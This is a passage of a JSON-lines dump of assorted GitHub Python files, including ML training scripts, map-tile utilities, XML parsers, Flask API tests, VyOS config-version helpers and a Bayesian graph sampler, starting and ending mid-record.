--training_data_path=\\\"path_to_trainingdata\\\"\")\n elif args.test:\n if args.model_path == None:\n raise TypeError(\"Please specify the path to model by setting the parameter --model_path=\\\"path_to_model\\\"\")\n else:\n if not args.testing_data_path == None:\n # Preprocess testing data. When first time called, data is preprocessed and saved to \"my_testing_data\"; this takes a considerably amount of time.\n # When this folder exists, data is loaded from it directly.\n test_loader = load_testing_data(args)\n # Testing data is being predicted and predictions are being saved in folder \"testing_data_prediction_classification\".\n test_model(test_loader, args)\n if not args.testing_data_solution_path == None:\n # Accuracy metric is being calculated between data in folder args.testing_data_solution_path and \"testing_data_prediction_classification\".\n test_acc, test_auc, test_f1s, test_precision, test_recall = calculateAccuracy(args)\n print(\"Testing accuracy: \" + str(test_acc))\n print(\"Testing AUC: \" + str(test_auc))\n print(\"Testing F1: \" + str(test_f1s))\n print(\"Testing Precision: \" + str(test_precision))\n print(\"Testing Recall: \" + str(test_recall))\n else:\n raise TypeError(\n \"Please specify the path to the testing solution/ground truth data by setting the parameter --testing_data_solution_path=\\\"path_to_testingdata_solution\\\"\")\n else:\n raise TypeError(\n \"Please specify the path to the testing data by setting the parameter --testing_data_path=\\\"path_to_testingdata\\\"\")\n","repo_name":"XRad-Ulm/E2MIP_LIDCI-IDRI_classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"24109861859","text":"import unittest\nfrom src.utils import process_str\n\n\nclass TestUtilFunctions(unittest.TestCase):\n\n def test_process_str(self):\n text = ' 3.2e-9 '\n processed_text = process_str(text)\n self.assertEqual(processed_text, '3.2e-9')\n\n def test_empty_str(self):\n text = ''\n processed_text = process_str(text)\n self.assertEqual(processed_text, '')","repo_name":"addadda023/real-trump-tweets","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5257569837","text":"def altchar(x):\n answer = 0\n poop = []\n i = 0\n g = 1\n for letter in x:\n poop.append(letter)\n while g < len(poop):\n if poop[i] == poop[g]:\n answer = answer + 1\n g = g + 1\n else:\n i = g\n g = g + 1\n return answer\n\n\ninputs = []\nnum = int(input())\nfor i in range(num):\n a = str(input())\n inputs.append(a)\nfor yep in inputs:\n print(altchar(yep))\n","repo_name":"baranmcl/HackerRank_Solutions","sub_path":"Algorithms/Strings/Alternating_Characters/Alternating_Characters.py","file_name":"Alternating_Characters.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3058847297","text":"from ev_station_assets.assets import GenericBattery, GenericBatteryState\n\n\nbattery_initial_state = GenericBatteryState(\n soc=0.5,\n current_power=0.00\n)\n\nbattery_1 = GenericBattery(\n name=\"battery_1\",\n nameplate_capacity=350.00,\n capacity=350.00,\n inverter_size=150.00,\n current_state=battery_initial_state\n)\n\n","repo_name":"sharabhshukla/ev-station-sim","sub_path":"apps/simulation/ev_charging/station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"9384484574","text":"from os import makedirs, path as fpath\n\nfrom buildok.action import Action\n\n\nclass MakeDir(Action):\n r\"\"\"Make a directory or make recursive directories.\n\n Args:\n path (str): Path to directory.\n\n Retuns:\n str: Human readable descriptor message or error.\n\n Raises:\n OSError: If an invalid `path` is provided or if path already exists.\n\n Accepted statements:\n ^create (?:folder|directory) `(?P<path>.+)`$\n ^make new (?:folder|directory) `(?P<path>.+)`$\n\n Sample input:\n - Go to `/tmp`.\n - Create folder `buildok_test_folder`.\n\n Expected:\n Created new directory => buildok_test_folder\n \"\"\"\n\n def run(self, path=None, *args, **kwargs):\n try:\n if not fpath.isdir(path):\n makedirs(path)\n self.success(\"Created new directory => %s\" % path)\n except OSError as e:\n self.fail(str(e))\n\n @classmethod\n def convert_shell(cls, path=None, *args, **kwargs):\n if path is not None:\n return \"mkdir -p %s\" % path\n return \"echo cannot create folder because of invalid path\"\n","repo_name":"lexndru/buildok","sub_path":"buildok/statements/mkdir.py","file_name":"mkdir.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42054873514","text":"import random\nimport torch\nimport argparse\n\nfrom sys import argv\nfrom classes import tagger as tg\nfrom classes import tools\n\ndef optimize(x, y, optimizer, model, data):\n optimizer.zero_grad()\n output = model(data.words2IDvecs(x))\n loss = torch.nn.CrossEntropyLoss().to(model.device)\n loss_output = loss(output, torch.LongTensor(data.tags2IDs(y)).to(model.device))\n loss_output.backward()\n optimizer.step()\n\ndef dev_evaluate(x, y, model, data, total_tagged, sum_corr):\n total_tagged += len(y)\n output = model(data.words2IDvecs(x))\n sum_corr += sum([1 for ix,iy in zip(output,torch.LongTensor(data.tags2IDs(y))) if torch.argmax(ix).item() == iy.item()])\n accuracy = sum_corr / total_tagged\n return accuracy\n\ndef check_accuracy(accuracy, best_current_accuracy, model):\n if accuracy > best_current_accuracy:\n best_current_accuracy = accuracy\n print(\"\\n====\\nBEST ACCURACY CHANGED : {}\\n====\\n\".format(best_current_accuracy))\n torch.save(model, args.parfile+'.rnn')\n else:\n print('====\\nAccuracy unchanged.\\n====')\n return best_current_accuracy\n \ndef train(data, tagger, numEpochs, optimizer):\n tagger.train()\n if args.gpu:\n tagger.cuda()\n tagger.to(tagger.device)\n best_current_acc = 0.0\n for epoch in range(numEpochs):\n for x, y in data.trainSentences:\n optimize(x, y, optimizer, tagger, data)\n random.shuffle(data.trainSentences)\n total_tagged, sum_corr = 0, 0\n for x, y in data.devSentences:\n accuracy = dev_evaluate(x, y, tagger,data, total_tagged, sum_corr)\n best_current_acc = check_accuracy(accuracy, best_current_acc, tagger)\n\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='Set hyperparams for tagger RNN')\n\n #positional args\n parser.add_argument('trainfile', type=str , help='set training data')\n parser.add_argument('devfile', type=str, help='set development data')\n parser.add_argument('parfile', type=str, help='set file to load/dump data attributes. Needs suffix')\n\n #optional args\n parser.add_argument('--num_epochs', type=int, help='set the number of epochs of the training')\n parser.add_argument('--emb_size', type=int, help='set the number of dimensions of the embedding matrix. This will impact the training speed, but also affects quality')\n parser.add_argument('--rnn_size', type=int, help='set the number of dimensions of the LSTM vector. This will impact the training speed, but also affects quality')\n parser.add_argument('--dropout_rate', type=float, help='set the dropout rate')\n parser.add_argument('--learning_rate', type=float, help='set the learning rate of the optimizer')\n parser.add_argument('--gpu', type=tools.str2bool, nargs='?', const=True, default=False, help='set True if cuda-able GPU is available. Else set False')\n\n args = parser.parse_args()\n \n print('Initisalizing training...\\n\\n Parameters:\\n')\n print(' EMBSIZE : {}\\n RNNSIZE : {}\\n NUMEPOCHS :{}\\n DO_RATE :{}\\n L_RATE : {}\\n CUDA : {}\\n\\n'.format(args.emb_size, args.rnn_size, args.num_epochs, args.dropout_rate, args.learning_rate, args.gpu))\n\n dataset = tg.Data(args.trainfile, args.devfile)\n save_dataset = input('Do you want to save the dataset yes <y>, no <n> ?')\n if save_dataset == 'y':\n dataset.store_parameters(args.parfile)\n tagger = tg.TaggerModel(len(dataset.char_id)+1, dataset.numTags, args.emb_size, args.rnn_size, args.dropout_rate, args.gpu)\n print('training...')\n train(dataset, tagger, args.num_epochs, torch.optim.Adam(tagger.parameters(), lr=args.learning_rate))","repo_name":"amonsoes/neural-word-tagger","sub_path":"rnn-training.py","file_name":"rnn-training.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16827571955","text":"from typing import Optional\n\nfrom tile_tools.common.types import Tile\n\n# Maximum zoom level used by Mapbox.\nMAX_ZOOM = 28\n# Minimum zoom level used by Mapbox.\nMIN_ZOOM = 0\n\n\ndef get_children(tile: Tile, zmax: Optional[int] = MAX_ZOOM) -> list[Tile]:\n \"\"\"Get the four tiles at one higher zoom level.\n\n Args:\n tile - Current tile as (x, y, z) tuple\n zmax - Maximum zoom level. Use `0` or `None` to disable.\n\n Returns:\n Four tiles at the next highest zoom level. Note that in practice, since\n zoom levels are finite, if the next highest zoom level exceeds `zmax`,\n an empty list will be returned (i.e., the tile has no children). This\n behavior can be disabled by passing `0` or `None` for `zmax`.\n \"\"\"\n x0, y0, z0 = tile\n z1 = z0 + 1\n\n # Check zoom bounds\n if zmax and z1 > zmax:\n return []\n\n x1 = 2 * x0\n y1 = 2 * y0\n\n return [\n (x1, y1, z1),\n (x1 + 1, y1, z1),\n (x1 + 1, y1 + 1, z1),\n (x1, y1 + 1, z1),\n ]\n\n\ndef get_parent(tile: Tile, zmin: Optional[int] = MIN_ZOOM) -> Tile:\n \"\"\"Get the tile at one coarser zoom level as the current one.\n\n Args:\n tile - Current tile as (x, y, z) tuple\n zmin - Minimum zoom level. Use `None` to disable.\n\n Returns:\n The parent tile as (x, y, z). If the new zoom would go below `zmin`,\n the null tile (0, 0, 0) is returned. Mathematically the (x, y) coords\n would go here regardless, but `z` will be not be decremented below\n the value of `zmin`. Use `None` if you'd like to arbitrarily decrement\n `z` to negative numbers in the parent.\n \"\"\"\n x0, y0, z0 = tile\n z1 = z0 - 1\n if zmin is not None and z1 < zmin:\n return (0, 0, 0)\n\n x1 = x0 >> 1\n y1 = y0 >> 1\n return (x1, y1, z1)\n\n\ndef get_siblings(tile: Tile) -> list[Tile]:\n \"\"\"Get all adjacent tiles to this one.\n\n Note the behavior differs slightly from @mapbox/tilebelt, which will return\n the current tile in the siblings list.\n\n Args:\n tile - Current tile as (x, y, z) tuple\n\n Returns:\n List of adjacent tiles\n \"\"\"\n # TODO: this could be optimized. We just copied the shortcut used by the\n # original authors in @mapbox/tilebelt, and added the filter on the\n # original tile.\n all_parent_children = get_children(get_parent(tile, zmin=None), zmax=None)\n return [child for child in all_parent_children if tile != child]\n\n\ndef has_siblings(tile: Tile, siblings: list[Tile]) -> bool:\n \"\"\"Test if a given `tile`'s siblings match given `siblings`.\n\n The tile itself can optionally be omitted from the siblings list and the\n test will still return True.\n\n Args:\n tile - Current tile as (x, y, z) tuple\n siblings - Set of three or four siblings to test\n\n Returns:\n True if `tile` is adjacent to every member of `siblings`.\n \"\"\"\n # Optimized path for invalid inputs\n if len(siblings) < 3:\n return False\n\n real_sibs = set(get_siblings(tile))\n # Don't consider tile itself in this test.\n cand_sibs = {s for s in siblings if s != tile}\n # NOTE: The logic in the original implementation is a little odd. It will\n # return true as long as the real siblings are a subset of the input.\n return real_sibs.issubset(cand_sibs)\n","repo_name":"biglocalnews/tile-tools","sub_path":"tile_tools/tilebelt/traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31935343550","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 03 14:32:32 2015\r\n\r\n@author: slcf\r\n\"\"\"\r\n\r\n#from xml.etree.ElementTree import parse\r\n#import xml.etree.ElementTree\r\nimport xml.etree.ElementTree as ET\r\nimport pickle\r\n\r\n## f.readlines()\r\ncategory = 'kitchen/'\r\nf = open(\"C:/Users/Woojin/Documents/GitHub/DomainAdaptation/Data/original amazon/electronics/all_new.review\",\"rb\")\r\n\r\n## exception \r\n#try:%\r\ntree = ET.parse(f)\r\n#except xml.etree.ElementTree.ParseError as e:\r\n# print e\r\n# a = str(e)\r\n# r1 = a[5] \r\n \r\nf.close()\r\nnote = tree.getroot()\r\n\r\nrev_data = [];\r\nrev_tx_rating = [];\r\n\r\nfor rev_xml in note.getiterator(\"review\"):\r\n rev_data.append(rev_xml.findtext(\"review_text\"))\r\n rev_tx_rating.append(rev_xml.findtext(\"rating\"))\r\n\r\nrev_rating = []\r\nfor i in rev_tx_rating:\r\n rev_rating.append(float(i))\r\n \r\n \r\n## file save\r\n\r\nf = open(\"C:/Users/Woojin/Documents/GitHub/DomainAdaptation/Data/original amazon/electronics/elec_all_preprocessed.txt\",'wb')\r\npickle.dump(rev_data,f)\r\nf.close()\r\n\r\nf = open(\"C:/Users/Woojin/Documents/GitHub/DomainAdaptation/Data/original amazon/electronics/delec_all_label.txt\",'wb')\r\npickle.dump(rev_rating,f)\r\nf.close()\r\n","repo_name":"wj926/DA_dataset","sub_path":"xml_test.py","file_name":"xml_test.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74455113592","text":"import csv\nimport xml.etree.ElementTree as ET\ntree = ET.parse('saliva_metabolites.xml')\nroot = tree.getroot()\n#print(root)\nns ={'nsstring':'http://www.hmdb.ca'}\nheader = ['accession','pathway_name','smpdb_id','kegg_map_id','disease_name','omim_id','pubmed_id']\nbio_props = []\nwith open(\"saliva_paths_diseases.csv\",\"w\") as sal:\n writer= csv.writer(sal)\n for metabolite in root.findall('nsstring:metabolite', ns):\n accession = metabolite.find('nsstring:accession',ns) #Extract data at level#1\n for biological_properties in metabolite.findall('nsstring:biological_properties',ns):\n for pathways in biological_properties.findall('nsstring:pathways',ns):\n for pathway in pathways.findall('nsstring:pathway',ns):\n pathway_name= pathway.find('nsstring:name',ns)\n try:\n v_pathway_name = pathway_name.text\n except:\n v_pathway_name = 'unknown'\n smpdb_id= pathway.find('nsstring:smpdb_id',ns)\n try:\n v_smpdb_id = smpdb_id.text\n except:\n v_smpdb_id = 'unknown'\n kegg_map_id= pathway.find('nsstring:kegg_map_id',ns)\n try:\n v_kegg_map_id = kegg_map_id.text\n except:\n v_kegg_map_id = 'unknown'\n for diseases in metabolite.findall('nsstring:diseases',ns):\n for disease in diseases.findall('nsstring:disease',ns):\n disease_name=disease.find('nsstring:name',ns)\n try:\n v_disease_name = disease_name.text\n except:\n v_disease_name = 'unknown'\n omim_id= disease.find('nsstring:omim',ns)\n try:\n v_omim_id = omim_id.text\n except:\n v_omim_id = 'unknown'\n # print(disease_name.text,omim_id.text) #has Nonetype\n for references in disease.findall('nsstring:references',ns):\n for reference in references.findall('nsstring:reference',ns):\n ref_text=reference.find('nsstring:reference_text',ns)\n try:\n v_ref_text = ref_text.text\n except:\n v_ref_text = 'unknown'\n pubmed_id= reference.find('nsstring:pubmed_id',ns)\n try:\n v_pubmed_id = pubmed_id.text\n except:\n v_pubmed_id = 'unknown'\n bio_props.append([accession.text,v_pathway_name,v_smpdb_id,v_kegg_map_id,v_disease_name,v_omim_id,v_pubmed_id])\n writer.writerow(header)\n for row in bio_props:\n writer.writerow(row)\nsal.close()\n","repo_name":"aginnimb/Knowledgebase","sub_path":"saliva_paths_disease.py","file_name":"saliva_paths_disease.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34040763645","text":"import json\nimport unittest\nfrom flask import Flask\nfrom app import api_bp\nfrom config import TestConfig\nfrom models import db\nfrom flask_testing import TestCase\n\n\ndef create_test_app():\n app = Flask(__name__)\n app.config.from_object(TestConfig)\n app.register_blueprint(api_bp, url_prefix='/api')\n db.init_app(app)\n app.app_context().push()\n return app\n\n\nclass TestCase(TestCase):\n headers = {\n 'Accept': 'application/vnd.api+json',\n 'Content-Type': 'application/vnd.api+json'\n }\n\n def create_app(self):\n return create_test_app()\n\n def setUp(self):\n app = create_test_app()\n db.init_app(app)\n db.create_all()\n self.client = app.test_client()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def test_endpoints(self):\n response = self.client.get('/api/todolists')\n assert response.status_code == 200\n assert \"Hello, todolists is empty yet!\" in response.json['message']\n\n response = self.client.get('/api/tasks')\n assert response.status_code == 200\n assert \"Hello, tasks are not created yet!\" in response.json['message']\n\n def test_all(self):\n # create a todolist\n data = {\"name\": \"First list\"}\n response = self.client.post('/api/todolists', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n # assert \"First list\" in response.json.get('data')['name']\n todo = response.json.get('todolist')\n assert \"First list\" in todo['name']\n\n # check /todolists/id endpoint\n response = self.client.get('/api/todolists/'+str(todo['id']))\n assert response.status_code == 200\n assert 'todolist' in response.json\n assert response.json.get('todolist') == todo\n\n # create second todolist\n data = {\"name\": \"Second todo list\"}\n response = self.client.post('/api/todolists', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n todo2 = response.json.get('todolist')\n assert \"Second todo list\" in todo2['name']\n\n # create task\n data = {\"name\": \"First task\", \"todolist_id\": '1'}\n response = self.client.post('api/tasks', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n assert 'task' in response.json\n task = response.json['task']\n assert task['name'] == data['name']\n\n # create second task\n data = {\"name\": \"Second task\", \"todolist_id\": '2'}\n response = self.client.post('api/tasks', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n assert 'task' in response.json\n task2 = response.json['task']\n assert task2['name'] == data['name']\n\n # create third task\n data = {\"name\": \"Third task\", \"todolist_id\": '1'}\n response = self.client.post('api/tasks', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n assert 'task' in response.json\n task3 = response.json['task']\n assert task3['name'] == data['name']\n\n # check /todolists/<id>/tasks\n response = self.client.get('api/todolists/'+str(todo['id'])+'/tasks', headers=self.headers)\n assert response.status_code == 200\n assert task in response.json['tasks']\n assert task2 not in response.json['tasks']\n\n response = self.client.get('api/todolists/' + str(todo2['id']) + '/tasks', headers=self.headers)\n assert response.status_code == 200\n assert task2 in response.json['tasks']\n assert task not in response.json['tasks']\n\n # check /tasks/\n response = self.client.get('api/tasks', headers=self.headers)\n assert response.status_code == 200\n assert task in response.json['tasks']\n assert task2 in response.json['tasks']\n\n # check /tasks/<id>\n response = self.client.get('api/tasks/' + str(task['id']), headers=self.headers)\n assert response.status_code == 200\n assert response.json['task'] == task\n assert response.json['task'] != task2\n\n # check /todolists/ endpoint content\n todo1 = (self.client.get('/api/todolists/1')).json['todolist']\n todo2 = (self.client.get('/api/todolists/2')).json['todolist']\n task1 = (self.client.get('/api/tasks/1')).json['task']\n\n task2 = (self.client.get('/api/tasks/2')).json['task']\n task3 = (self.client.get('/api/tasks/3')).json['task']\n # task1.pop('todolist_id', None)\n del task1['todolist_id']\n del task2['todolist_id']\n del task3['todolist_id']\n response = self.client.get('/api/todolists')\n assert response.status_code == 200\n assert 'todolists' in response.json\n\n todolists = response.json['todolists']\n assert todo1 in todolists\n assert todo2 in todolists\n assert task1 in todolists[0]['tasks']\n assert task3 in todolists[0]['tasks']\n assert task2 not in todolists[0]['tasks']\n\n assert task2 in todolists[1]['tasks']\n assert task1 not in todolists[1]['tasks']\n assert task3 not in todolists[1]['tasks']\n\n # test finish task\n assert task1['done'] is False\n data = {'done': True}\n response = self.client.put('/api/tasks/'+str(task1['id'])+'/finish', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 204\n\n response = self.client.get('/api/tasks/'+str(task1['id']), headers=self.headers)\n assert response.json['task']['id'] == task1['id']\n assert response.json['task']['done'] is True\n\n # check TaskAddToList post /todolists/<int:todolist_id>/add_task/<int:task_id>\n # let's add task2 to todo1\n response = self.client.post('/api/todolists/'+str(todo1['id'])+'/add_task/'+str(task2['id']),\n data=json.dumps(data),\n headers=self.headers)\n assert response.status_code == 204\n todo1 = (self.client.get('/api/todolists/1')).json['todolist']\n task2 = (self.client.get('/api/tasks/2')).json['task']\n assert task2['todolist_id'] == 1\n del task2['todolist_id']\n assert task2 in todo1['tasks']\n\n # test editing task\n task2 = (self.client.get('/api/tasks/2')).json['task']\n data = {\"name\": \"Just other name\", \"todolist_id\": task2['todolist_id']}\n response = self.client.put('/api/tasks/'+str(task2['id']), data=json.dumps(data), headers=self.headers)\n assert response.status_code == 204\n task2 = (self.client.get('/api/tasks/2')).json['task']\n assert task2['name'] == data['name']\n\n # test delete task\n task2 = (self.client.get('/api/tasks/2')).json['task']\n response = self.client.delete('/api/tasks/'+str(task2['id']), headers=self.headers)\n assert response.status_code == 204\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ollavrova/todolist_api","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71736912314","text":"#ASSERT WITHOUT ERROR MSG\r\n\r\n#if assertion is True -> does nothing, goes to new line\r\n#if assertion is False -> throws assertion error\r\n\r\ndef avg(marks):\r\n assert len(marks) != 0\r\n return sum(marks)/len(marks)\r\n\r\nmark1 = [11, 22, 33]\r\nprint(avg(mark1)) #22.0\r\n\r\nmark2 = []\r\nprint(avg(mark2)) #AssertionError\r\n","repo_name":"dilshvn/python-flask-udemy","sub_path":"codes/assertion_without_error_msg.py","file_name":"assertion_without_error_msg.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"34871247341","text":"import os\nimport re\nimport sys\nimport fileinput\n\nfrom vyos.xml_ref import component_version\nfrom vyos.version import get_version\nfrom vyos.defaults import directories\n\nDEFAULT_CONFIG_PATH = os.path.join(directories['config'], 'config.boot')\n\ndef from_string(string_line, vintage='vyos'):\n \"\"\"\n Get component version dictionary from string.\n Return empty dictionary if string contains no config information\n or raise error if component version string malformed.\n \"\"\"\n version_dict = {}\n\n if vintage == 'vyos':\n if re.match(r'// vyos-config-version:.+', string_line):\n if not re.match(r'// vyos-config-version:\\s+\"([\\w,-]+@\\d+:)+([\\w,-]+@\\d+)\"\\s*', string_line):\n raise ValueError(f\"malformed configuration string: {string_line}\")\n\n for pair in re.findall(r'([\\w,-]+)@(\\d+)', string_line):\n version_dict[pair[0]] = int(pair[1])\n\n elif vintage == 'vyatta':\n if re.match(r'/\\* === vyatta-config-version:.+=== \\*/$', string_line):\n if not re.match(r'/\\* === vyatta-config-version:\\s+\"([\\w,-]+@\\d+:)+([\\w,-]+@\\d+)\"\\s+=== \\*/$', string_line):\n raise ValueError(f\"malformed configuration string: {string_line}\")\n\n for pair in re.findall(r'([\\w,-]+)@(\\d+)', string_line):\n version_dict[pair[0]] = int(pair[1])\n else:\n raise ValueError(\"Unknown config string vintage\")\n\n return version_dict\n\ndef from_file(config_file_name=DEFAULT_CONFIG_PATH, vintage='vyos'):\n \"\"\"\n Get component version dictionary parsing config file line by line\n \"\"\"\n with open(config_file_name, 'r') as f:\n for line_in_config in f:\n version_dict = from_string(line_in_config, vintage=vintage)\n if version_dict:\n return version_dict\n\n # no version information\n return {}\n\ndef from_system():\n \"\"\"\n Get system component version dict.\n \"\"\"\n return component_version()\n\ndef format_string(ver: dict) -> str:\n \"\"\"\n Version dict to string.\n \"\"\"\n keys = list(ver)\n keys.sort()\n l = []\n for k in keys:\n v = ver[k]\n l.append(f'{k}@{v}')\n sep = ':'\n return sep.join(l)\n\ndef version_footer(ver: dict, vintage='vyos') -> str:\n \"\"\"\n Version footer as string.\n \"\"\"\n ver_str = format_string(ver)\n release = get_version()\n if vintage == 'vyos':\n ret_str = (f'// Warning: Do not remove the following line.\\n'\n + f'// vyos-config-version: \"{ver_str}\"\\n'\n + f'// Release version: {release}\\n')\n elif vintage == 'vyatta':\n ret_str = (f'/* Warning: Do not remove the following line. */\\n'\n + f'/* === vyatta-config-version: \"{ver_str}\" === */\\n'\n + f'/* Release version: {release} */\\n')\n else:\n raise ValueError(\"Unknown config string vintage\")\n\n return ret_str\n\ndef system_footer(vintage='vyos') -> str:\n \"\"\"\n System version footer as string.\n \"\"\"\n ver_d = from_system()\n return version_footer(ver_d, vintage=vintage)\n\ndef write_version_footer(ver: dict, file_name, vintage='vyos'):\n \"\"\"\n Write version footer to file.\n \"\"\"\n footer = version_footer(ver=ver, vintage=vintage)\n if file_name:\n with open(file_name, 'a') as f:\n f.write(footer)\n else:\n sys.stdout.write(footer)\n\ndef write_system_footer(file_name, vintage='vyos'):\n \"\"\"\n Write system version footer to file.\n \"\"\"\n ver_d = from_system()\n return write_version_footer(ver_d, file_name=file_name, vintage=vintage)\n\ndef remove_footer(file_name):\n \"\"\"\n Remove old version footer.\n \"\"\"\n for line in fileinput.input(file_name, inplace=True):\n if re.match(r'/\\* Warning:.+ \\*/$', line):\n continue\n if re.match(r'/\\* === vyatta-config-version:.+=== \\*/$', line):\n continue\n if re.match(r'/\\* Release version:.+ \\*/$', line):\n continue\n if re.match('// vyos-config-version:.+', line):\n continue\n if re.match('// Warning:.+', line):\n continue\n if re.match('// Release version:.+', line):\n continue\n sys.stdout.write(line)\n","repo_name":"vyos/vyos-1x","sub_path":"python/vyos/component_version.py","file_name":"component_version.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":325,"dataset":"github-code","pt":"95"} +{"seq_id":"10359507359","text":"import time\n\nimport numpy as np\nfrom scipy.stats import poisson\nfrom scipy.sparse import triu, csr_matrix\nfrom scipy.special import gammaln\nfrom numpy import log, exp\n\nfrom .GGPutils import GGPpsi, GGPkappa, GGPsumrnd\n\n\ndef tpoissonrnd(lograte):\n # sample from a zero-truncated poisson distribution (support: strictly positive integer)\n x = np.ones(lograte.shape)\n ind = lograte > 1e-5 # below this value, x=1 w. very high prob.\n rate_ind = lograte[ind]\n x[ind] = poisson.ppf(exp(-rate_ind) + np.random.random(rate_ind.shape) * (1. - exp(-rate_ind)), rate_ind)\n return x\n\n\ndef grad_U(N, w, w_rem, sigma, tau):\n return -(N - sigma) + w * (tau + 2. * np.sum(w) + 2. * w_rem)\n\n\ndef update_n_Gibbs(logw, K, ind1, ind2):\n lograte_poi = log(2.) + logw[ind1] + logw[ind2]\n lograte_poi[ind1 == ind2] = 2. * logw[ind1[ind1 == ind2]]\n d = tpoissonrnd(lograte_poi)\n count = csr_matrix((d, (ind1, ind2)), (K, K))\n N = count.sum(0).T + count.sum(1)\n\n return N, d, count\n\n\ndef update_n_MH(logw, d, K, count, ind1, ind2, nbMH):\n for i in range(nbMH):\n lograte_poi = log(2.) + logw[ind1] + logw[ind2]\n lograte_poi[ind1 == ind2] = 2. * logw[ind1[ind1 == ind2]]\n ind = d == 1\n dprop = d\n dprop[ind] = 2\n if np.sum(ind == 0) > 0:\n dprop[ind == 0] = dprop[ind == 0] + 2. * np.random.randint(0, 2, size=np.sum(ind == 0)) - 3\n\n logqprop = np.zeros(ind.shape)\n logqprop[ind == 0] = log(.5)\n\n indbis = dprop == 1\n logq = np.zeros(indbis.shape)\n if np.sum(indbis == 0) > 0:\n logq[indbis == 0] = log(.5)\n\n diff_d = (dprop - d)\n logaccept_d = diff_d * lograte_poi - gammaln(dprop + 1.) + gammaln(d + 1.) - logqprop + logq\n logaccept_d[np.isnan(logaccept_d)] = -np.Inf\n indaccept = log(np.random.random(logaccept_d.shape)) < logaccept_d\n d[indaccept] = dprop[indaccept]\n count += csr_matrix((diff_d[indaccept], (ind1[indaccept], ind2[indaccept])), (K, K))\n N = count.sum(0).T + count.sum(1)\n\n return N, d, count\n\n\ndef update_w(w, logw, w_rem, N, L, epsilon, sigma, tau, issimple):\n sum_w = np.sum(w)\n sumall_w = sum_w + w_rem\n\n K = len(w)\n logwprop = logw\n p = np.random.normal(size=(K))\n grad1 = grad_U(N, w, w_rem, sigma, tau)\n pprop = p - epsilon * grad1 / 2.\n\n for lp in range(L):\n logwprop = logwprop + epsilon * pprop\n if lp != L - 1:\n pprop = pprop - epsilon * grad_U(N, exp(logwprop), w_rem, sigma, tau)\n\n wprop = exp(logwprop)\n pprop = pprop - epsilon / 2. * grad_U(N, wprop, w_rem, sigma, tau)\n\n sum_wprop = np.sum(wprop)\n sumall_wprop = sum_wprop + w_rem\n temp1 = -sumall_wprop ** 2. + sumall_w ** 2 + np.sum(\n (N - sigma - 1.) * (logwprop - logw) - tau * (sum_wprop - sum_w))\n\n logaccept = temp1 - .5 * np.sum(pprop ** 2 - p ** 2) - np.sum(logw) + np.sum(logwprop)\n if issimple:\n logaccept += np.sum(wprop ** 2) - np.sum(w ** 2)\n\n if np.isnan(logaccept):\n logaccept = -np.Inf\n\n if log(np.random.random()) < logaccept:\n w = wprop\n logw = logwprop\n\n rate = np.min(1, exp(logaccept))\n return w, logw, rate\n\n\ndef update_hyper(w, logw, w_rem, alpha, logalpha, sigma,\n tau, nbMH, rw_std, estimate_alpha, estimate_sigma, estimate_tau,\n hyper_alpha, hyper_sigma, hyper_tau, rw_alpha):\n K = len(w)\n for nn in range(nbMH):\n sum_w = np.sum(w)\n sumall_w = sum_w + w_rem\n\n # Sample (alpha, sigma, tau, w*) from the proposal distribution\n if estimate_sigma:\n sigmaprop = 1. - exp(log(1 - sigma) + rw_std[0] * np.random.normal())\n else:\n sigmaprop = sigma\n\n if estimate_tau:\n tauprop = exp(log(tau) + rw_std[1] * np.random.normal())\n else:\n tauprop = tau\n\n if sigmaprop > -1.:\n if estimate_alpha:\n if rw_alpha == 0:\n alphaprop = np.random.gamma(K, 1. / (GGPpsi(2. * sum_w + 2. * w_rem, 1., sigmaprop, tauprop)))\n else:\n alphaprop = alpha * exp(.02 * np.random.normal())\n logalphaprop = log(alphaprop)\n else:\n alphaprop = alpha\n logalphaprop = logalpha\n\n wprop_rem = GGPsumrnd(alphaprop, sigmaprop, tauprop + 2. * sum_w + 2. * w_rem)\n else:\n if estimate_alpha:\n if rw_alpha == 0:\n alpha2prop = np.random.gamma(K,\n 1. / (GGPpsi((2. * sum_w + 2. * w_rem) / tauprop, 1., sigmaprop, 1.)))\n logalphaprop = log(alpha2prop) - 